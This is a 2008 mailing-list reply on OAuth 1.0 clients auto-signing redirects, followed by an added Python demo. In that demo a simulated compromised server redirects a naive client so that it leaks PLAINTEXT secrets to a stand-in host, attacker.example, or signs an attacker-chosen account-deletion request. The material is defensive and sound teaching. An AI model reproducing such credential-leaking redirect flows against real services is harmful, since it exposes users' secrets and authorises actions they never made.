On Mon, Nov 24, 2008 at 8:34 PM, Brian Eaton <[EMAIL PROTECTED]> wrote:
> On Mon, Nov 24, 2008 at 11:59 AM, John Kristian <[EMAIL PROTECTED]> wrote:
> > It would be nice if OAuth client libraries automatically handled
> > redirects and signed each request.
>
> Wearing my security hat... automatically signing redirect URLs is
> risky. What if the response from the service provider is compromised?
>
> If you're using plaintext signatures, you leak your secrets to
> wherever the attacker redirects you.
>
> If you're using HMAC or RSA, you leak signatures for whatever URL you
> are redirected to. The attacker can force you to make near-arbitrary
> signed OAuth requests.
>
> I suppose https is the obvious answer to this, since it guarantees the
> response from the SP really came from the SP's servers.

I'm also wondering what kind of compromise would allow an attacker to send a redirect without seeing the original request?
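The two failure modes Brian describes, played out in code. This is an added example, not code from the thread or from any OAuth library: the credentials, the hosts sp.example and attacker.example, the "/account/delete" endpoint and the in-memory transport that stands in for the network are all constructed. The signing code follows the OAuth 1.0 base-string and HMAC-SHA1 rules (as later written down in RFC 5849); the "compromised response" is simply modelled as the SP's reply being attacker-controlled, without assuming how that came about.

```python
"""Why an OAuth 1.0 client must not auto-sign redirected requests (added example)."""
import base64, hashlib, hmac
from urllib.parse import parse_qsl, quote, urlsplit

# Constructed credentials and hosts for the demonstration only.
CONSUMER_KEY, CONSUMER_SECRET = "dpf43f3p2l4k3l03", "kd94hf93k423kf44"
TOKEN, TOKEN_SECRET = "nnch734d00sl2jdk", "pfkkdhi9sl3r4s00"
SP_ORIGIN = "https://sp.example"
ATTACKER_URL = "http://attacker.example/collect"           # attacker's own server
DESTRUCTIVE_URL = SP_ORIGIN + "/account/delete?confirm=1"  # hypothetical sensitive SP endpoint


def pct(s):
    """RFC 3986 percent-encoding as OAuth 1.0 requires (RFC 5849 section 3.6)."""
    return quote(str(s), safe="~")


def base_string(method, url, oauth_params):
    """OAuth 1.0 signature base string (RFC 5849 section 3.4.1)."""
    u = urlsplit(url)
    base_url = f"{u.scheme.lower()}://{u.netloc.lower()}{u.path}"
    params = list(parse_qsl(u.query, keep_blank_values=True)) + list(oauth_params.items())
    normalized = "&".join(f"{k}={v}" for k, v in sorted((pct(k), pct(v)) for k, v in params))
    return "&".join([method.upper(), pct(base_url), pct(normalized)])


def sign(method, url, sig_method):
    """Build the oauth_* parameters for one request, signed with PLAINTEXT or HMAC-SHA1."""
    oauth = {"oauth_consumer_key": CONSUMER_KEY, "oauth_token": TOKEN,
             "oauth_signature_method": sig_method, "oauth_timestamp": "1227556800",
             "oauth_nonce": "fixed-for-demo", "oauth_version": "1.0"}  # real clients randomize the nonce
    key = f"{pct(CONSUMER_SECRET)}&{pct(TOKEN_SECRET)}"
    if sig_method == "PLAINTEXT":
        oauth["oauth_signature"] = key  # PLAINTEXT sends the shared secrets themselves
    else:
        mac = hmac.new(key.encode(), base_string(method, url, oauth).encode(), hashlib.sha1)
        oauth["oauth_signature"] = base64.b64encode(mac.digest()).decode()
    return oauth


def verify_hmac(method, url, oauth):
    """What the SP does on receipt: recompute HMAC-SHA1 over the same base string and compare."""
    params = {k: v for k, v in oauth.items() if k != "oauth_signature"}
    key = f"{pct(CONSUMER_SECRET)}&{pct(TOKEN_SECRET)}"
    mac = hmac.new(key.encode(), base_string(method, url, params).encode(), hashlib.sha1)
    return hmac.compare_digest(base64.b64encode(mac.digest()).decode(), oauth["oauth_signature"])


def compromised_transport(redirect_to, captured):
    """Fake network: the first reply from sp.example is attacker-controlled and is a 302 to
    `redirect_to`; every request the client sends (URL plus signed params) lands in `captured`."""
    def send(method, url, oauth):
        captured.append((method, url, dict(oauth)))
        if urlsplit(url).netloc == "sp.example" and len(captured) == 1:
            return 302, redirect_to
        return 200, None
    return send


def naive_client(url, sig_method, send, max_hops=3):
    """Follows redirects and signs every hop: the behaviour proposed in the thread."""
    for _ in range(max_hops):
        status, location = send("GET", url, sign("GET", url, sig_method))
        if status != 302:
            return status, url
        url = location
    raise RuntimeError("too many redirects")


class RedirectNotFollowed(Exception):
    """Surfaces a redirect so the application, not the library, decides whether to sign it."""


def careful_client(url, sig_method, send):
    """Signs only the request the caller asked for; a redirect is never auto-signed."""
    status, location = send("GET", url, sign("GET", url, sig_method))
    if status == 302:
        raise RedirectNotFollowed(location)
    return status, url


def plaintext_leak():
    """Naive client + PLAINTEXT: the attacker's server receives consumer and token secrets."""
    captured = []
    naive_client(SP_ORIGIN + "/photos", "PLAINTEXT", compromised_transport(ATTACKER_URL, captured))
    _, url, oauth = captured[-1]
    return url, oauth["oauth_signature"]


def forced_signed_request():
    """Naive client + HMAC-SHA1: a valid signature over a URL the attacker chose is emitted."""
    captured = []
    naive_client(SP_ORIGIN + "/photos", "HMAC-SHA1", compromised_transport(DESTRUCTIVE_URL, captured))
    method, url, oauth = captured[-1]
    return url, verify_hmac(method, url, oauth)


def careful_client_refuses():
    """Same compromised reply against a client that does not auto-sign: one request signed."""
    captured = []
    try:
        careful_client(SP_ORIGIN + "/photos", "HMAC-SHA1", compromised_transport(DESTRUCTIVE_URL, captured))
    except RedirectNotFollowed:
        return len(captured)
    return -1
```

`plaintext_leak()` shows the PLAINTEXT case: the signature the naive client hands to attacker.example is literally `consumer_secret&token_secret`. `forced_signed_request()` shows the HMAC case: the redirect points back at the SP itself, so a same-origin or https-only check on the Location header would still let it through, and the client produces a signature the SP accepts for a request the user never made. That is why the careful client above refuses to sign any redirect rather than filtering them; TLS on the original request limits who can inject the redirect, but does not make auto-signing a redirected URL safe on its own.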
